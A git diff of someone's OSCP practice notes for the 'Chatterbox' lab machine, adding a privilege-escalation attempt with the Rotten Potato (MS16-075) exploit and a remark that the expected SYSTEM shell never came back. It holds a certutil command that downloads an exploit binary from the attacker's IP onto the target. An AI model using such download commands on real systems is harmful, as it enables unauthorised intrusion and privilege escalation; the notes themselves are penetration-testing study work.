--- a/docs/OSCP practice exam/2. Chatterbox.md
+++ b/docs/OSCP practice exam/2. Chatterbox.md
@@ -307,6 +307,15 @@ Nothing else really cool in WinPEAS - guess I should try exploit suggester. Here
 
 ## PrivEsc
 
+### MS16-075 - Rotten Potato
 ```cmd
-certutil.exe -urlcache -f http://10.10.16.4:80/MS14-40-x86.exe pe.exe
+certutil.exe -urlcache -f http://10.10.16.4:80/potato.exe potato.exe
 ```
+
+![[Pasted image 20220204002645.png]]
+
+Sleeping for 5 mins....I guess I'll wait for my SYSTEM shell...
+
+Shell never came back :( coming back to this later.
+
+
